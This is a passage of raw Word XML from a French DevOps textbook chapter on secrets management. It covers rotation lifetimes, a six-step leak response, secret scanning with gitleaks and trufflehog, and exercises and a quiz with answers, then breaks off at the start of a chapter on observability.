        <w:br/>
        <w:br/>
        <w:t># Détecter un usage résiduel de l'ancien secret</w:t>
        <w:br/>
        <w:t>kubectl logs -n production deploy/app --since=1h | grep -c "401"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.315 — Cinq durées de vie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46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Type de secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Durée de vie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mot de passe de base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>6 à 12 mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Planifiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>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Clé d'API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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3 à 6 mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Automatisée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jeton de courte durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Minutes à heures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>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Certificat TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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90 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Automatique (ACME)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clé de chiffrement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1 an</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Avec ré-chiffrement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>82.6 Détecter et réagir à une fuite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La détection peut être préventive (analyse du dépôt) ou réactive (alerte d'un fournisseur). Dans les deux cas, la première action est la révocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.316 — Six étapes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154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Étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="489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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Délai cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1545"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4893"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Révoquer le secret</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Minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="154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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="489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Émettre un remplacement</w:t>
            </w:r>
          </w:p>
        </w:tc>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Minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1545"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4893"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déployer la nouvelle valeur</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Heures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="154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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="489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Chercher l'usage malveillant</w:t>
            </w:r>
          </w:p>
        </w:tc>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Heures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1545"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4893"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corriger la cause racine</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Jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="154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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="489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Documenter et informer</w:t>
            </w:r>
          </w:p>
        </w:tc>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Jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois protections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Analyse préventive : chercher des motifs de secrets</w:t>
        <w:br/>
        <w:t>gitleaks detect --source . --verbose</w:t>
        <w:br/>
        <w:t>trufflehog git file://. --only-verified</w:t>
        <w:br/>
        <w:br/>
        <w:t># Bloquer avant le commit</w:t>
        <w:br/>
        <w:t>pre-commit install</w:t>
        <w:br/>
        <w:t># .pre-commit-config.yaml</w:t>
        <w:br/>
        <w:t># - repo: https://github.com/gitleaks/gitleaks</w:t>
        <w:br/>
        <w:t>#   hooks: [{ id: gitleaks }</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RÈGLES DE GESTION DES SECRETS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Aucun secret en clair dans un dépôt, même privé.</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 secret par environnement et par service.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 accès nominatif au coffre, journalisé.</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Rotation planifiée et testée.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Révocation immédiate dès qu'une fuite est suspectée.</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secret est une valeur qui permet d'agir.</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fichier supprimé reste dans l'historique Git.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coffre central lit le secret à l'exécution.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chiffrement dans Git déplace le secret vers la clé.</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fichier monté se rafraîchit, une variable d'environnement non.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rotation exige une période de recouvrement.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révocation précède toujours l'analyse.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secret détecté est un secret compromis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les secrets sont protégés. Le chapitre suivant rend le système observable.</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82.1 — Classer des valeurs</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Six valeurs doivent être rangées entre Git et coffre.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Identifiez la nature.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Justifiez chaque choix.</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Précisez l'emplacement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 82.2 — Monter un secret</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Une application doit lire un mot de passe sans redémarrage.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Créez le secret.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Montez-le en fichier.</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Faites relire le fichier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 82.3 — Réagir à une fuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   INCIDENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une clé d'API a été publiée dans un dépôt public.</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Révoquez.</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Remplacez.</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Cherchez l'usage.</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82.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nom d'hôte → Git. Niveau de journalisation → Git. Certificat public → Git.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mot de passe de base → coffre. Clé d'API → coffre. Clé privée → coffre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Règle : une valeur qui permet d'agir est un secret.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 82.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Secret</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: base</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>type: Opaque</w:t>
        <w:br/>
        <w:t>stringData:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  motdepasse: "changé-a-la-creation"</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t># Montage</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">    secret:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      secretName: base</w:t>
        <w:br/>
        <w:t>volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mountPath: /run/secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">    readOnly: true</w:t>
        <w:br/>
        <w:br/>
        <w:t># L'application relit /run/secrets/motdepasse à chaque connexion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stringData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite l'encodage base64 manuel à la création.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le fichier est rafraîchi par le kubelet, avec un délai de l'ordre de la minute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 82.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Révoquer la clé dans la console du fournisseur (2 min)</w:t>
        <w:br/>
        <w:t>2. Créer une nouvelle clé, la stocker dans le coffre</w:t>
        <w:br/>
        <w:t>3. Déployer la nouvelle valeur</w:t>
        <w:br/>
        <w:t>4. Consulter les journaux d'accès de la clé : adresses, dates, volumes</w:t>
        <w:br/>
        <w:t>5. Vérifier les factures et les quotas</w:t>
        <w:br/>
        <w:t>6. Ajouter une détection automatique dans la CI</w:t>
        <w:br/>
        <w:t>7. Documenter l'incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attendre avant de révoquer laisse la fenêtre d'exploitation ouverte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les journaux du fournisseur permettent de savoir si la clé a servi.</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 faire d'un secret poussé par erreur dans Git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Supprimer le fichier</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Réécrire l'historique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Révoquer et remplacer</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Rendre le dépôt privé</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Quel avantage d'un secret monté en fichier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Il est chiffré</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Il peut être rafraîchi</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Il est plus court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Il évite le coffre</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 déplace le chiffrement d'un secret dans Git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Le problème vers la clé</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Rien</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 secret vers le cluster</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 secret vers la CI</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Pourquoi une période de recouvrement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Pour économiser</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Pour éviter une coupure pendant la rotation</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Pour chiffrer</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Pour auditer</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Quelle est la première action en cas de fuite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Analyser</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Révoquer</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Informer</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Documenter</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La valeur doit être considérée comme compromise.</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Le kubelet met à jour le contenu monté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La clé de déchiffrement devient le véritable secret.</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Les deux valeurs sont acceptées le temps de la bascule.</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La révocation ferme la fenêtre d'exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>83. Observabilité : métriques, journaux et traces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
